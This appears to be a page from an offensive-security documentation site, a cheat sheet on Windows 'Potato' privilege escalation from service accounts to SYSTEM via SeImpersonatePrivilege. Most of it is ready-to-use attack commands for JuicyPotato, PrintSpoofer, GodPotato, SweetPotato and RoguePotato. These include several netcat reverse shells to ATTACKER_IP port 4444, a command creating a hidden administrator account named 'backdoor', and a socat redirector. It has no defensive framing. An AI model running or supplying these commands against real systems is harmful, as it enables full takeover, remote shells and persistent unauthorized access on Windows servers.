Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
Potato attacks exploit SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to escalate from a service account (IIS, MSSQL, etc.) to SYSTEM.
Check Privileges
whoami /priv | findstr /i "impersonate assign"
| Privilege | Required by |
|---|
SeImpersonatePrivilege | JuicyPotato, PrintSpoofer, GodPotato, SweetPotato, RoguePotato |
SeAssignPrimaryTokenPrivilege | JuicyPotato |
Service accounts like IIS APPPOOL, NT AUTHORITY\LOCAL SERVICE, NT AUTHORITY\NETWORK SERVICE, and SQL Server accounts typically have these privileges by default.
Which Potato to Use
| Tool | Windows Version | Notes |
|---|
| JuicyPotato | 7, 8, 10 (< 1809), Server 2008–2016 | Needs valid CLSID |
| RoguePotato | 10, Server 2019 | Needs attacker-controlled machine |
| PrintSpoofer | 10, Server 2016/2019 | Simplest, abuses print spooler |
| GodPotato | All (.NET 4+) | Works on 2012–2022, most universal |
| SweetPotato | 10, Server 2016/2019 | Combines multiple techniques |
Download
Kali Linux
ls /usr/share/windows-resources/juicy-potato/
# /usr/share/windows-resources/juicy-potato/JuicyPotato.exe
GitHub
# JuicyPotato
https://github.com/ohpe/juicy-potato/releases
# PrintSpoofer
https://github.com/itm4n/PrintSpoofer/releases
# GodPotato
https://github.com/BeichenDream/GodPotato/releases
# SweetPotato
https://github.com/CCob/SweetPotato/releases
# RoguePotato
https://github.com/antonioCoco/RoguePotato/releases
Check Architecture
wmic os get osarchitecture
JuicyPotato
Abuses COM servers with CLSID to impersonate SYSTEM token.
Basic Usage
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami" -t *
Reverse Shell
JuicyPotato.exe -l 1337 -p C:\Windows\Temp\nc.exe -a "-e cmd.exe ATTACKER_IP 4444" -t *
With Specific CLSID
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t * -c {CLSID}
Finding Valid CLSIDs
# Test common CLSIDs
# Full list: https://ohpe.it/juicy-potato/CLSID
| OS | CLSID |
|---|
| Windows 10 | {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} |
| Windows Server 2016 | {8BC3F05E-D86B-11D0-A075-00C04FB68820} |
| Windows Server 2012 | {e60687f7-01a1-40aa-86ac-db1cbf673334} |
JuicyPotato does NOT work on Windows 10 build 1809+ and Server 2019+. Use PrintSpoofer or GodPotato instead.
PrintSpoofer
Abuses the print spooler service to capture SYSTEM token. Simpler than JuicyPotato.
Interactive SYSTEM Shell
PrintSpoofer.exe -i -c cmd
Execute Command as SYSTEM
PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"
Reverse Shell
PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
GodPotato
Works on most modern Windows versions. Requires .NET 4+.
Check .NET Version
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" /v Version
Execute Command
GodPotato.exe -cmd "cmd /c whoami"
Reverse Shell
GodPotato.exe -cmd "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
Add Admin User
GodPotato.exe -cmd "net user backdoor P@ssw0rd /add && net localgroup administrators backdoor /add"
SweetPotato
Combines multiple potato techniques (EfsPotato, PrintSpoofer, JuicyPotato).
Execute Command
SweetPotato.exe -p C:\Windows\System32\cmd.exe -a "/c whoami"
Reverse Shell
SweetPotato.exe -p C:\Windows\Temp\nc.exe -a "-e cmd.exe ATTACKER_IP 4444"
RoguePotato
For Windows 10 1809+ / Server 2019. Requires attacker-controlled machine for OXID resolution.
Attacker (redirect port 135)
socat tcp-listen:135,reuseaddr,fork tcp:TARGET:9999
Victim
RoguePotato.exe -r ATTACKER_IP -e "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" -l 9999
Quick Decision
whoami /priv → SeImpersonatePrivilege enabled?
│
├─ Windows 10 < 1809 / Server 2016 → JuicyPotato
├─ Windows 10 1809+ / Server 2019 → PrintSpoofer or GodPotato
├─ .NET 4+ available → GodPotato (most universal)
└─ Need external listener → RoguePotato